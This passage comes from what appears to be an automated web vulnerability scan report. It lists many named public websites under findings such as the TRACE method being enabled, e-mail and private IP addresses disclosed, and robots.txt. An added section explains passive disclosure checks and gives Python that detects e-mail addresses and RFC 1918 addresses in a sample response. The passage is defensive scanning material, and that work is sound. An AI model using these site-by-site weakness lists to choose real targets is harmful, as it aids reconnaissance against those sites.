20.34. http://www.pga.com/favicon.ico

20.35. http://www.popularscreensavers.com/favicon.ico

20.36. http://www.skype.com/favicon.ico

20.37. http://www.suntimes.com/favicon.ico

20.38. http://www.tasteofhome.com/favicon.ico

20.39. http://www.teennick.com/favicon.ico

20.40. http://www.ufc.com/favicon.ico

20.41. http://www.usa.gov/favicon.ico

20.42. http://www.usajobs.gov/favicon.ico

20.43. http://www.videobash.com/favicon.ico

20.44. http://www.websitealive.com/favicon.ico

20.45. http://www.wellness.com/favicon.ico

20.46. http://www.whitepages.com/favicon.ico

20.47. http://www.xbox.com/favicon.ico

20.48. http://www.yallwire.com/favicon.ico

21. TRACE method is enabled

21.1. http://smp.adviva.net/

21.2. http://www.110mb.com/

21.3. http://www.123greetings.com/

21.4. http://www.2wire.net/

21.5. http://www.4chan.org/

21.6. http://www.about.com/

21.7. http://www.aceshowbiz.com/

21.8. http://www.ad4game.com/

21.9. http://www.adfunky.com/

21.10. http://www.adriver.ru/

21.11. http://www.allbusiness.com/

21.12. http://www.allmenus.com/

21.13. http://www.allvoices.com/

21.14. http://www.alphadictionary.com/

21.15. http://www.amerisave.com/

21.16. http://www.andiesisle.com/

21.17. http://www.answerbag.com/

21.18. http://www.aolnews.com/

21.19. http://www.apartmenthomeliving.com/

21.20. http://www.apartmentratings.com/

21.21. http://www.apples4theteacher.com/

21.22. http://www.articlesbase.com/

21.23. http://www.autotrader.com/

21.24. http://www.barackobama.com/

21.25. http://www.beezid.com/

21.26. http://www.bible.cc/

21.27. http://www.biglots.com/

21.28. http://www.blackberry.com/

21.29. http://www.blackplanet.com/

21.30. http://www.blastro.com/

21.31. http://www.blogs.com/

21.32. http://www.bluemountain.com/

21.33. http://www.blurtit.com/

21.34. http://www.breitbart.com/

21.35. http://www.btradv.com/

21.36. http://www.buzzfeed.com/

21.37. http://www.buzzillions.com/

21.38. http://www.buzznet.com/

21.39. http://www.cafemom.com/

21.40. http://www.care2.com/

21.41. http://www.caringbridge.org/

21.42. http://www.cartoonnetwork.com/

21.43. http://www.cdkitchen.com/

21.44. http://www.cheapstuff.com/

21.45. http://www.chuckecheese.com/

21.46. http://www.cincinnati.com/

21.47. http://www.city-data.com/

21.48. http://www.citygridmedia.com/

21.49. http://www.classesusa.com/

21.50. http://www.classifiedads.com/

21.51. http://www.clear-request.com/

21.52. http://www.clear.com/

21.53. http://www.cliffsnotes.com/

21.54. http://www.clocklink.com/

21.55. http://www.clubpenguin.com/

21.56. http://www.clubtug.com/

21.57. http://www.coldhardcash.com/

21.58. http://www.collegeconfidential.com/

21.59. http://www.consumeraffairs.com/

21.60. http://www.contactmusic.com/

21.61. http://www.coolsavings.com/

21.62. http://www.cornell.edu/

21.63. http://www.couponmountain.com/

21.64. http://www.cowboylyrics.com/

21.65. http://www.cox.net/

21.66. http://www.craveonline.com/

21.67. http://www.cyberdefender.com/

21.68. http://www.cz.cc/

21.69. http://www.datpiff.com/

21.70. http://www.demdex.net/

21.71. http://www.detiva.com/

21.72. http://www.dmv.org/

21.73. http://www.domaingateway.com/

21.74. http://www.doubleinks.com/

21.75. http://www.driverside.com/

21.76. http://www.driversquad.com/

21.77. http://www.droidforums.net/

21.78. http://www.eatingwell.com/

21.79. http://www.ebaumsworld.com/

21.80. http://www.economist.com/

21.81. http://www.egotastic.com/

21.82. http://www.ehealthforum.com/

21.83. http://www.elyrics.net/

21.84. http://www.elyricsworld.com/

21.85. http://www.emediatrack.com/

21.86. http://www.emedtv.com/

21.87. http://www.engadget.com/

21.88. http://www.ezanga.com/

21.89. http://www.fantage.com/

21.90. http://www.faqs.org/

21.91. http://www.fetedoris.com/

21.92. http://www.findagrave.com/

21.93. http://www.findlaw.com/

21.94. http://www.findlocaljobsnow.com/

21.95. http://www.flixster.com/

21.96. http://www.forbes.com/

21.97. http://www.forless.com/

21.98. http://www.formspring.me/

21.99. http://www.freelogs.com/

21.100. http://www.freeonlinegames.com/

21.101. http://www.freeridegames.com/

21.102. http://www.friendster.com/

21.103. http://www.froo.com/

21.104. http://www.funwebproducts.com/

21.105. http://www.gamesradar.com/

21.106. http://www.gamewinners.com/

21.107. http://www.gardenweb.com/

21.108. http://www.gather.com/

21.109. http://www.gemoney.com/

21.110. http://www.genealogy.com/

21.111. http://www.gf2ube.com/

21.112. http://www.gifts.com/

21.113. http://www.golikeus.net/

21.114. http://www.gravity.com/

21.115. http://www.greatschools.org/

21.116. http://www.guardian.co.uk/

21.117. http://www.healthcare.com/

21.118. http://www.home-remedies-for-you.com/

21.119. http://www.homegain.com/

21.120. http://www.homestead.com/

21.121. http://www.hotelguides.com/

21.122. http://www.iloveindia.com/

21.123. http://www.imagevenue.com/

21.124. http://www.indeed.com/

21.125. http://www.infomash.org/

21.126. http://www.insiderpages.com/

21.127. http://www.itt-tech.edu/

21.128. http://www.iwon.com/

21.129. http://www.jobsonline.net/

21.130. http://www.jobsonlinemail.net/

21.131. http://www.justia.com/

21.132. http://www.justluxe.com/

21.133. http://www.kaboose.com/

21.134. http://www.kazaa.com/

21.135. http://www.kcom.com/

21.136. http://www.know-where.com/

21.137. http://www.letssingit.com/

21.138. http://www.lijit.com/

21.139. http://www.likewut.net/

21.140. http://www.liveleak.com/

21.141. http://www.livevideo.com/

21.142. http://www.localpages.com/

21.143. http://www.lowermybills.com/

21.144. http://www.lowfares.com/

21.145. http://www.lyrics007.com/

21.146. http://www.lyricsmania.com/

21.147. http://www.macrumors.com/

21.148. http://www.made-in-china.com/

21.149. http://www.mainstreet.com/

21.150. http://www.manualsonline.com/

21.151. http://www.mapsofworld.com/

21.152. http://www.mediatakeout.com/

21.153. http://www.medicalnewstoday.com/

21.154. http://www.menupages.com/

21.155. http://www.metafilter.com/

21.156. http://www.mindjolt.com/

21.157. http://www.miniclip.com/

21.158. http://www.mochila.com/

21.159. http://www.mp3raid.com/

21.160. http://www.mrmovietimes.com/

21.161. http://www.multiply.com/

21.162. http://www.mylocalemployment.net/

21.163. http://www.mysanantonio.com/

21.164. http://www.mystart.com/

21.165. http://www.myway.com/

21.166. http://www.mywebsearch.com/

21.167. http://www.newgrounds.com/

21.168. http://www.newsweek.com/

21.169. http://www.nih.gov/

21.170. http://www.npr.org/

21.171. http://www.nps.gov/

21.172. http://www.ocregister.com/

21.173. http://www.onlinesearches.com/

21.174. http://www.onlywire.com/

21.175. http://www.openmyeyeslord.net/

21.176. http://www.opera.com/

21.177. http://www.outsidehub.com/

21.178. http://www.parenting.com/

21.179. http://www.pbs.org/

21.180. http://www.peopleofwalmart.com/

21.181. http://www.pgatour.com/

21.182. http://www.pickyourown.org/

21.183. http://www.picsearch.com/

21.184. http://www.pittsburghlive.com/

21.185. http://www.playfin.com/

21.186. http://www.politicsdaily.com/

21.187. http://www.popularscreensavers.com/

21.188. http://www.primarygames.com/

21.189. http://www.pronto.com/

21.190. http://www.psu.edu/

21.191. http://www.publicrecordschecks.com/

21.192. http://www.purdue.edu/

21.193. http://www.purplemath.com/

21.194. http://www.quizlet.com/

21.195. http://www.rasmussenreports.com/

21.196. http://www.rawtube.com/

21.197. http://www.rent.com/

21.198. http://www.retailmenot.com/

21.199. http://www.retrevo.com/

21.200. http://www.roxwel.com/

21.201. http://www.salon.com/

21.202. http://www.sbnation.com/

21.203. http://www.sfgate.com/

21.204. http://www.sheknows.com/

21.205. http://www.simplyrecipes.com/

21.206. http://www.sing365.com/

21.207. http://www.siteencore.com/

21.208. http://www.smarter.com/

21.209. http://www.smileycentral.com/

21.210. http://www.snopes.com/

21.211. http://www.socialsecurity.gov/

21.212. http://www.soft82.com/

21.213. http://www.songlyrics.com/

21.214. http://www.spanishdict.com/

21.215. http://www.squidoo.com/

21.216. http://www.ssa.gov/

21.217. http://www.starpulse.com/

21.218. http://www.steadyhealth.com/

21.219. http://www.stlyrics.com/

21.220. http://www.stumbleupon.com/

21.221. http://www.stylelist.com/

21.222. http://www.suite101.com/

21.223. http://www.suntimes.com/

21.224. http://www.superiorpics.com/

21.225. http://www.tagged.com/

21.226. http://www.talkingpointsmemo.com/

21.227. http://www.tarot.com/

21.228. http://www.tastebook.com/

21.229. http://www.terra.com/

21.230. http://www.theepochtimes.com/

21.231. http://www.thefind.com/

21.232. http://www.theglobeandmail.com/

21.233. http://www.thegrids.info/

21.234. http://www.thehollywoodgossip.com/

21.235. http://www.thomasnet.com/

21.236. http://www.timeanddate.com/

21.237. http://www.tmz.com/

21.238. http://www.tomshardware.com/

21.239. http://www.toptenreviews.com/

21.240. http://www.tradekey.com/

21.241. http://www.travelpod.com/

21.242. http://www.truste.com/

21.243. http://www.twitlonger.com/

21.244. http://www.ucomparehealthcare.com/

21.245. http://www.ufl.edu/

21.246. http://www.use.com/

21.247. http://www.usgs.gov/

21.248. http://www.utube.com/

21.249. http://www.veoh.com/

21.250. http://www.vimeo.com/

21.251. http://www.vitals.com/

21.252. http://www.wa.gov/

21.253. http://www.walletpop.com/

21.254. http://www.wapedia.mobi/

21.255. http://www.washington.edu/

21.256. http://www.weather.com/

21.257. http://www.weather.gov/

21.258. http://www.weatherbug.com/

21.259. http://www.webring.org/

21.260. http://www.weebly.com/

21.261. http://www.wendys.com/

21.262. http://www.wikimedia.org/

21.263. http://www.wikio.com/

21.264. http://www.wiktionary.org/

21.265. http://www.worthpoint.com/

21.266. http://www.wowhead.com/

21.267. http://www.wrongdiagnosis.com/

21.268. http://www.xe.com/

21.269. http://www.yallwire.com/

21.270. http://www.yellow.com/

21.271. http://www.yidio.com/

21.272. http://www.younghollywood.com/

21.273. http://www.yourdictionary.com/

21.274. http://www.yourfilehost.com/

21.275. http://www.zabasearch.com/

21.276. http://www.zeusclicks.com/

21.277. http://www.zwinky.com/

21.278. http://www.zynga.com/

22. Email addresses disclosed

22.1. http://www.androidcentral.com/favicon.ico

22.2. http://www.bookrags.com/favicon.ico

22.3. http://www.kcom.com/contact-us/

22.4. http://www.kcom.com/contact-us/brighton

22.5. http://www.livevideo.com/favicon.ico

22.6. http://www.menupages.com/favicon.ico

22.7. http://www.mycheckfree.com/favicon.ico

22.8. http://www.myrecipes.com/favicon.ico

22.9. http://www.opentable.com/favicon.ico

22.10. http://www.realsimple.com/favicon.ico

22.11. http://www.springerlink.com/favicon.ico

22.12. http://www.thefreedictionary.com/favicon.ico

22.13. http://www.travel-ticker.com/favicon.ico

22.14. http://www.va.gov/favicon.ico

22.15. http://www.wa.gov/favicon.ico

22.16. http://www.websitealive.com/favicon.ico

23. Private IP addresses disclosed

23.1. http://www.aa.com/favicon.ico

23.2. http://www.americantowns.com/favicon.ico

23.3. http://www.celebuzz.com/favicon.ico

23.4. http://www.facebook.com/favicon.ico

23.5. http://www.findgovernmentjobs.info/favicon.ico

23.6. http://www.frontier.com/favicon.ico

23.7. http://www.healthcaresource.com/favicon.ico

23.8. http://www.lanebryant.com/favicon.ico

23.9. http://www.myyearbook.com/favicon.ico

23.10. http://www.ning.com/favicon.ico

23.11. http://www.phoneagentsource.com/favicon.ico

23.12. http://www.shoebuy.com/favicon.ico

23.13. http://www.tracfone.com/favicon.ico

23.14. http://www.younghollywood.com/favicon.ico
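
The two categories above (22 and 23) are passive checks on response content: the scanner flags any e-mail address and any RFC 1918 address it sees in headers or body, which reveals internal naming and topology but is not itself exploitable. As an added example that is not the report's or the scanner's own code, the following Python implements the same two checks over a constructed HTTP response; the sample response, its header names, e-mail addresses and IP addresses are all made up for illustration. It goes slightly beyond the list above by validating candidate addresses so that lookalikes such as version strings and out-of-range octets are not reported.

```python
import ipaddress
import re

# Constructed sample response (not taken from the report); the addresses and
# header names are illustrative only.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Served-By: 10.20.30.40\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>\n"
    "<!-- built by webmaster@example.com on build-172.31.255.7 -->\n"
    "<a href='mailto:support@example.org'>Contact</a>\n"
    "<p>Version 1.2.3.4 served from 172.32.0.1 via proxy 192.168.0.1</p>\n"
    "<p>Noise: 999.1.1.1 and 8.8.8.8</p>\n"
    "</body></html>\n"
)

# Loose e-mail pattern: enough for a passive disclosure check, not RFC 5322.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Dotted quad that is not part of a longer dotted run (so "1.192.168.1.1"
# does not yield a bogus "192.168.1.1"); octet range is validated below.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# RFC 1918 ranges; note 172.x is private only within 172.16.0.0/12.
PRIVATE_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def find_emails(text):
    """Return the distinct e-mail addresses found in text, sorted."""
    return sorted(set(EMAIL_RE.findall(text)))


def find_private_ips(text):
    """Return the distinct RFC 1918 addresses found in text, sorted.

    Candidates that only look like an address (e.g. 999.1.1.1) are rejected
    by ipaddress, and public addresses are ignored.
    """
    found = set()
    for cand in IPV4_RE.findall(text):
        try:
            addr = ipaddress.IPv4Address(cand)
        except ValueError:
            continue
        if any(addr in net for net in PRIVATE_NETS):
            found.add(cand)
    return sorted(found)


def passive_checks(raw_response):
    """Run both disclosure checks over a raw HTTP response (headers + body).

    Headers are scanned too, because internal addresses commonly leak via
    load-balancer or cache headers rather than the HTML.
    """
    return {
        "emails_disclosed": find_emails(raw_response),
        "private_ips_disclosed": find_private_ips(raw_response),
    }


if __name__ == "__main__":
    for category, hits in passive_checks(SAMPLE_RESPONSE).items():
        print(category, hits)
```

In practice such findings are worth a line in the report only when the address or mailbox is internal to the target; third-party addresses (ad networks, CDNs) in the body are noise, and a private address in a header such as `X-Served-By` is the one that tells an attacker something about the backend.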

24. Robots.txt file

24.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

24.2. http://fls.doubleclick.net/activityi

24.3. http://googleads.g.doubleclick.net/pagead/ads

24.4. http://pagead2.googlesyndication.com/pagead/imgad

24.5. http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.swf

24.6. http://smp.adviva.net/track/v=4

24.7. http://www.110mb.com/favicon.ico

24.8. http://www.123greetings.com/favicon.ico

24.9. http://www.2insure4less.com/favicon.ico

24.10. http://www.2leep.com/favicon.ico

24.11. http://www.411.com/favicon.ico

24.12. http://www.43things.com/favicon.ico

24.13. http://www.4chan.org/favicon.ico

24.14. http://www.4tubemate.com/favicon.ico

24.15. http://www.6pm.com/favicon.ico

24.16. http://www.800notes.com/favicon.ico

24.17. http://www.aaa.com/favicon.ico

24.18. http://www.aarp.org/favicon.ico

24.19. http://www.abebooks.com/favicon.ico

24.20. http://www.about.com/favicon.ico

24.21. http://www.aboutus.org/favicon.ico

24.22. http://www.accesshollywood.com/favicon.ico

24.23. http://www.accuweather.com/favicon.ico

24.24. http://www.acehardware.com/favicon.ico

24.25. http://www.aceshowbiz.com/favicon.ico

24.26. http://www.active.com/favicon.ico

24.27. http://www.addictinggames.com/favicon.ico

24.28. http://www.adobe.com/favicon.ico

24.29. http://www.adp.com/favicon.ico

24.30. http://www.adriver.ru/favicon.ico

24.31. http://www.advanceautoparts.com/favicon.ico

24.32. http://www.ae.com/favicon.ico

24.33. http://www.aeropostale.com/favicon.ico

24.34. http://www.af.mil/favicon.ico

24.35. http://www.agame.com/favicon.ico

24.36. http://www.alaskaair.com/favicon.ico

24.37. http://www.alexa.com/favicon.ico

24.38. http://www.alibris.com/favicon.ico

24.39. http://www.allbusiness.com/favicon.ico

24.40. http://www.allposters.com/favicon.ico

24.41. http://www.allrecipes.com/favicon.ico

24.42. http://www.allvoices.com/favicon.ico

24.43. http://www.ally.com/favicon.ico

24.44. http://www.alphadictionary.com/favicon.ico

24.45. http://www.altavista.com/favicon.ico

24.46. http://www.alumniclass.com/favicon.ico

24.47. http://www.amazon.co.uk/favicon.ico

24.48. http://www.americanexpress.com/favicon.ico

24.49. http://www.americangreetings.com/favicon.ico

24.50. http://www.americantowns.com/favicon.ico

24.51. http://www.amerisave.com/favicon.ico

24.52. http://www.amtrak.com/favicon.ico

24.53. http://www.ancestry.com/favicon.ico

24.54. http://www.andkon.com/favicon.ico

24.55. http://www.androidcentral.com/favicon.ico

24.56. http://www.androidforums.com/favicon.ico

24.57. http://www.angieslist.com/favicon.ico

24.58. http://www.answerbag.com/favicon.ico

24.59. http://www.aolnews.com/favicon.ico

24.60. http://www.apartmentguide.com/favicon.ico

24.61. http://www.apartmenthomeliving.com/favicon.ico

24.62. http://www.apartmentratings.com/favicon.ico

24.63. http://www.apartments.com/favicon.ico

24.64. http://www.apple.com/favicon.ico

24.65. http://www.apples4theteacher.com/favicon.ico

24.66. http://www.archive.org/favicon.ico

24.67. http://www.areaconnect.com/favicon.ico

24.68. http://www.articlesbase.com/favicon.ico

24.69. http://www.askmen.com/favicon.ico

24.70. http://www.associatedcontent.com/favicon.ico

24.71. http://www.astrology.com/favicon.ico

24.72. http://www.atom.com/favicon.ico

24.73. http://www.att.com/favicon.ico

24.74. http://www.autotrader.com/favicon.ico

24.75. http://www.autotraderstatic.com/favicon.ico

24.76. http://www.autozone.com/favicon.ico

24.77. http://www.avast.com/favicon.ico

24.78. http://www.azcentral.com/favicon.ico

24.79. http://www.b2byellowpages.com/favicon.ico

24.80. http://www.babble.com/favicon.ico

24.81. http://www.babelgum.com/favicon.ico

24.82. http://www.babiesrus.com/favicon.ico

24.83. http://www.babycenter.com/favicon.ico

24.84. http://www.babylon.com/favicon.ico

24.85. http://www.backpage.com/favicon.ico

24.86. http://www.backtype.com/favicon.ico

24.87. http://www.baidu.com/favicon.ico

24.88. http://www.bankofamerica.com/favicon.ico

24.89. http://www.bankrate.com/favicon.ico

24.90. http://www.barnesandnoble.com/favicon.ico

24.91. http://www.bathandbodyworks.com/favicon.ico

24.92. http://www.bbc.co.uk/favicon.ico

24.93. http://www.bbt.com/favicon.ico

24.94. http://www.bearshare.com/favicon.ico

24.95. http://www.bedbathandbeyond.com/favicon.ico

24.96. http://www.beezid.com/favicon.ico

24.97. http://www.bellaonline.com/favicon.ico

24.98. http://www.bellsouth.com/favicon.ico

24.99. http://www.bestwestern.com/favicon.ico

24.100. http://www.bettycrocker.com/favicon.ico

24.101. http://www.beyond.com/favicon.ico

24.102. http://www.bhphotovideo.com/favicon.ico

24.103. http://www.biblegateway.com/favicon.ico

24.104. http://www.bigfishgames.com/favicon.ico

24.105. http://www.bigpoint.com/favicon.ico

24.106. http://www.bizjournals.com/favicon.ico

24.107. http://www.bizrate.com/favicon.ico

24.108. http://www.blackberry.com/favicon.ico

24.109. http://www.blackboard.com/favicon.ico

24.110. http://www.blackplanet.com/favicon.ico

24.111. http://www.blastro.com/favicon.ico

24.112. http://www.blockbuster.com/favicon.ico

24.113. http://www.blogtv.com/favicon.ico

24.114. http://www.bloomberg.com/favicon.ico

24.115. http://www.bls.gov/favicon.ico

24.116. http://www.bluemountain.com/favicon.ico

24.117. http://www.blurtit.com/favicon.ico

24.118. http://www.bnet.com/favicon.ico

24.119. http://www.bodybuilding.com/favicon.ico

24.120. http://www.boingboing.net/favicon.ico

24.121. http://www.boldchat.com/favicon.ico

24.122. http://www.booking.com/favicon.ico

24.123. http://www.bookrags.com/favicon.ico

24.124. http://www.borders.com/favicon.ico

24.125. http://www.boston.com/favicon.ico

24.126. http://www.brainyquote.com/favicon.ico

24.127. http://www.bravotv.com/favicon.ico

24.128. http://www.break.com/favicon.ico

24.129. http://www.brighthub.com/favicon.ico

24.130. http://www.britannica.com/favicon.ico

24.131. http://www.brothersoft.com/favicon.ico

24.132. http://www.btradv.com/favicon.ico

24.133. http://www.business.com/favicon.ico

24.134. http://www.businessweek.com/favicon.ico

24.135. http://www.buy.com/favicon.ico

24.136. http://www.buysafe.com/favicon.ico

24.137. http://www.buzzfeed.com/favicon.ico

24.138. http://www.buzzillions.com/favicon.ico

24.139. http://www.buzznet.com/favicon.ico

24.140. http://www.ca.gov/favicon.ico

24.141. http://www.cabelas.com/favicon.ico

24.142. http://www.cafemom.com/favicon.ico

24.143. http://www.canada.com/favicon.ico

24.144. http://www.candystand.com/favicon.ico

24.145. http://www.canon.com/favicon.ico

24.146. http://www.caranddriver.com/favicon.ico

24.147. http://www.care2.com/favicon.ico

24.148. http://www.careerbuilder.com/favicon.ico

24.149. http://www.careerrookie.com/favicon.ico

24.150. http://www.caringbridge.org/favicon.ico

24.151. http://www.carmax.com/favicon.ico

24.152. http://www.carnival.com/favicon.ico

24.153. http://www.cars.com/favicon.ico

24.154. http://www.cartoonnetwork.com/favicon.ico

24.155. http://www.casttv.com/favicon.ico

24.156. http://www.cbc.ca/favicon.ico

24.157. http://www.cbs.com/favicon.ico

24.158. http://www.cbssports.com/favicon.ico

24.159. http://www.cdc.gov/favicon.ico

24.160. http://www.cdkitchen.com/favicon.ico

24.161. http://www.cduniverse.com/favicon.ico

24.162. http://www.celebrity-gossip.net/favicon.ico

24.163. http://www.census.gov/favicon.ico

24.164. http://www.chacha.com/favicon.ico

24.165. http://www.charlotteobserver.com/favicon.ico

24.166. http://www.cheapoair.com/favicon.ico

24.167. http://www.chemistry.com/favicon.ico

24.168. http://www.chevrolet.com/favicon.ico

24.169. http://www.chicagotribune.com/favicon.ico

24.170. http://www.chilisemailclub.com/favicon.ico

24.171. http://www.choicehotels.com/favicon.ico

24.172. http://www.chow.com/favicon.ico

24.173. http://www.christianbook.com/favicon.ico

24.174. http://www.chron.com/favicon.ico

24.175. http://www.chuckecheese.com/favicon.ico

24.176. http://www.cincinnati.com/favicon.ico

24.177. http://www.cisco.com/favicon.ico

24.178. http://www.citibank.com/favicon.ico

24.179. http://www.city-data.com/favicon.ico

24.180. http://www.citygridmedia.com/favicon.ico

24.181. http://www.classesusa.com/favicon.ico

24.182. http://www.classifiedads.com/favicon.ico

24.183. http://www.classmates.com/favicon.ico

24.184. http://www.clear.com/favicon.ico

24.185. http://www.cmt.com/favicon.ico

24.186. http://www.cnbc.com/favicon.ico

24.187. http://www.cnet.com/favicon.ico

24.188. http://www.cnn.com/favicon.ico

24.189. http://www.cobaltnitra.com/favicon.ico

24.190. http://www.colbertnation.com/favicon.ico

24.191. http://www.collegeboard.com/favicon.ico

24.192. http://www.collegeconfidential.com/favicon.ico

24.193. http://www.collegehumor.com/favicon.ico

24.194. http://www.columbia.edu/favicon.ico

24.195. http://www.comcast.com/favicon.ico

24.196. http://www.comcast.net/favicon.ico

24.197. http://www.comedycentral.com/favicon.ico

24.198. http://www.comfortinn.com/favicon.ico

24.199. http://www.complaintsboard.com/favicon.ico

24.200. http://www.computing.net/favicon.ico

24.201. http://www.confirmit.com/favicon.ico

24.202. http://www.consumeraffairs.com/favicon.ico

24.203. http://www.consumerreports.org/favicon.ico

24.204. http://www.consumersearch.com/favicon.ico

24.205. http://www.contactatonce.com/favicon.ico

24.206. http://www.contactmusic.com/favicon.ico

24.207. http://www.contextoptional.com/favicon.ico

24.208. http://www.continental.com/favicon.ico

24.209. http://www.coolmath-games.com/favicon.ico

24.210. http://www.coolmath.com/favicon.ico

24.211. http://www.coolmath4kids.com/favicon.ico

24.212. http://www.coolsavings.com/favicon.ico

24.213. http://www.cornell.edu/favicon.ico

24.214. http://www.costco.com/favicon.ico

24.215. http://www.couponcabin.com/favicon.ico

24.216. http://www.couponmountain.com/favicon.ico

24.217. http://www.coupons.com/favicon.ico

24.218. http://www.coveritlive.com/favicon.ico

24.219. http://www.cowboylyrics.com/favicon.ico

24.220. http://www.cox.net/favicon.ico

24.221. http://www.cracked.com/favicon.ico

24.222. http://www.crackle.com/favicon.ico

24.223. http://www.craigslist.ca/favicon.ico

24.224. http://www.crateandbarrel.com/favicon.ico

24.225. http://www.creditreport.com/favicon.ico

24.226. http://www.csmonitor.com/favicon.ico

24.227. http://www.curse.com/favicon.ico

24.228. http://www.cvs.com/favicon.ico

24.229. http://www.dailyfinance.com/favicon.ico

24.230. http://www.dailykos.com/favicon.ico

24.231. http://www.dailymail.co.uk/favicon.ico

24.232. http://www.dailymotion.com/favicon.ico

24.233. http://www.datehookup.com/favicon.ico

24.234. http://www.deadline.com/favicon.ico

24.235. http://www.dealer.com/favicon.ico

24.236. http://www.dealtime.com/favicon.ico

24.237. http://www.dell.com/favicon.ico

24.238. http://www.demdex.net/favicon.ico

24.239. http://www.detnews.com/favicon.ico

24.240. http://www.deviantart.com/favicon.ico

24.241. http://www.dexknows.com/favicon.ico

24.242. http://www.dickssportinggoods.com/favicon.ico

24.243. http://www.digitaldesire.com/favicon.ico

24.244. http://www.directbuyvisitorpass.com/favicon.ico

24.245. http://www.directv.com/favicon.ico

24.246. http://www.discovery.com/favicon.ico

24.247. http://www.dishnetwork.com/favicon.ico

24.248. http://www.diynetwork.com/favicon.ico

24.249. http://www.dmv.org/favicon.ico

24.250. http://www.docstoc.com/favicon.ico

24.251. http://www.doctoroz.com/favicon.ico

24.252. http://www.dogpile.com/favicon.ico

24.253. http://www.doityourself.com/favicon.ico

24.254. http://www.domaintools.com/favicon.ico

24.255. http://www.dominos.com/favicon.ico

24.256. http://www.doubleinks.com/favicon.ico

24.257. http://www.dreamstime.com/favicon.ico

24.258. http://www.driverside.com/favicon.ico

24.259. http://www.droidforums.net/favicon.ico

24.260. http://www.drugs.com/favicon.ico

24.261. http://www.drugstore.com/favicon.ico

24.262. http://www.dslreports.com/favicon.ico

24.263. http://www.earthlink.net/favicon.ico

24.264. http://www.eastbay.com/favicon.ico

24.265. http://www.eatingwell.com/favicon.ico

24.266. http://www.ebaumsworld.com/favicon.ico

24.267. http://www.ebay.ca/favicon.ico

24.268. http://www.ebayclassifieds.com/favicon.ico

24.269. http://www.economist.com/favicon.ico

24.270. http://www.edmunds.com/favicon.ico

24.271. http://www.education.com/favicon.ico

24.272. http://www.egotastic.com/favicon.ico

24.273. http://www.eharmony.com/favicon.ico

24.274. http://www.ehealthforum.com/favicon.ico

24.275. http://www.ehow.co.uk/favicon.ico

24.276. http://www.elle.com/favicon.ico

24.277. http://www.elyrics.net/favicon.ico

24.278. http://www.emedtv.com/favicon.ico

24.279. http://www.encyclopedia.com/favicon.ico

24.280. http://www.engadget.com/favicon.ico

24.281. http://www.enotes.com/favicon.ico

24.282. http://www.enterprise.com/favicon.ico

24.283. http://www.eonline.com/favicon.ico

24.284. http://www.epa.gov/favicon.ico

24.285. http://www.epicurious.com/favicon.ico

24.286. http://www.epinions.com/favicon.ico

24.287. http://www.epodunk.com/favicon.ico

24.288. http://www.eppicard.com/favicon.ico

24.289. http://www.essortment.com/favicon.ico

24.290. http://www.etsy.com/favicon.ico

24.291. http://www.everydayhealth.com/favicon.ico

24.292. http://www.evtv1.com/favicon.ico

24.293. http://www.ew.com/favicon.ico

24.294. http://www.examiner.com/favicon.ico

24.295. http://www.expedia.com/favicon.ico

24.296. http://www.experienceproject.com/favicon.ico

24.297. http://www.ez-tracks.com/favicon.ico

24.298. http://www.ezanga.com/favicon.ico

24.299. http://www.factmonster.com/favicon.ico

24.300. http://www.familyeducation.com/favicon.ico

24.301. http://www.famousfootwear.com/favicon.ico

24.302. http://www.fandango.com/favicon.ico

24.303. http://www.fanfiction.net/favicon.ico

24.304. http://www.fanpop.com/favicon.ico

24.305. http://www.faqs.org/favicon.ico

24.306. http://www.fark.com/favicon.ico

24.307. http://www.farlex.com/favicon.ico

24.308. http://www.fastcompany.com/favicon.ico

24.309. http://www.fatwallet.com/favicon.ico

24.310. http://www.fda.gov/favicon.ico

24.311. http://www.fedex.com/favicon.ico

24.312. http://www.filehippo.com/favicon.ico

24.313. http://www.findagrave.com/favicon.ico

24.314. http://www.findgovernmentjobs.info/favicon.ico

24.315. http://www.findlocation.com/favicon.ico

24.316. http://www.finishline.com/favicon.ico

24.317. http://www.fixya.com/favicon.ico

24.318. http://www.flickr.com/favicon.ico

24.319. http://www.flixster.com/favicon.ico

24.320. http://www.flixxy.com/favicon.ico

24.321. http://www.fly.com/favicon.ico

24.322. http://www.food.com/favicon.ico

24.323. http://www.foodnetwork.com/favicon.ico

24.324. http://www.fool.com/favicon.ico

24.325. http://www.footballfanatics.com/favicon.ico

24.326. http://www.footlocker.com/favicon.ico

24.327. http://www.forbes.com/favicon.ico

24.328. http://www.fotosearch.com/favicon.ico

24.329. http://www.freecreditscore.com/favicon.ico

24.330. http://www.freedownloadmanager.org/favicon.ico

24.331. http://www.freefind.com/favicon.ico

24.332. http://www.freelogs.com/favicon.ico

24.333. http://www.freelotto.com/favicon.ico

24.334. http://www.freeonlinegames.com/favicon.ico

24.335. http://www.freerepublic.com/favicon.ico

24.336. http://www.freeridegames.com/favicon.ico

24.337. http://www.friendster.com/favicon.ico

24.338. http://www.frontier.com/favicon.ico

24.339. http://www.ft.com/favicon.ico

24.340. http://www.ftd.com/favicon.ico

24.341. http://www.funadvice.com/favicon.ico

24.342. http://www.funbrain.com/favicon.ico

24.343. http://www.funny-games.biz/favicon.ico

24.344. http://www.funnyordie.com/favicon.ico

24.345. http://www.g4tv.com/favicon.ico

24.346. http://www.gaiaonline.com/favicon.ico

24.347. http://www.gamefaqs.com/favicon.ico

24.348. http://www.gamerdna.com/favicon.ico

24.349. http://www.games.com/favicon.ico

24.350. http://www.gamesgames.com/favicon.ico

24.351. http://www.gamespot.com/favicon.ico

24.352. http://www.gamesradar.com/favicon.ico

24.353. http://www.gamestop.com/favicon.ico

24.354. http://www.gametrailers.com/favicon.ico

24.355. http://www.gamevance.com/favicon.ico

24.356. http://www.gamewinners.com/favicon.ico

24.357. http://www.gap.com/favicon.ico

24.358. http://www.gateway.com/favicon.ico

24.359. http://www.gather.com/favicon.ico

24.360. http://www.geico.com/favicon.ico

24.361. http://www.gemoney.com/favicon.ico

